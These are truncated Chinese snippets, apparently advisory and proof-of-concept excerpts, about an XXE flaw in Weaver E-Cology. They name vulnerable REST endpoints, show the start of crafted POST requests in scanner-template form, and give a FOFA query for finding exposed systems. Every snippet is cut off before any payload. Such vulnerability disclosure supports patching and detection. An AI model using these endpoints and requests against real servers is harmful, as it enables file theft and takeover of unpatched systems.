漏洞描述: 泛微协同管理应用平台E-Cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。 近日,泛微发布了 E-Cology 8.x 和 E-Cology 9.x 的10.58.2 版本的安全补丁,修复了一处 XML 外部实体注...
攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限reference:-https://blog.csdn.net/qq_41904294/article/details/131878446tags:ecology,XXErequests:-raw:-|- POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64...
泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞 泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。泛微e-cology系统接口/rest/ofs/deleteRequestInfoByXml 存在XXE漏洞 fofa app="泛微-协同商务系统" poc POST /rest/ofs/deleteRequestInfoByX...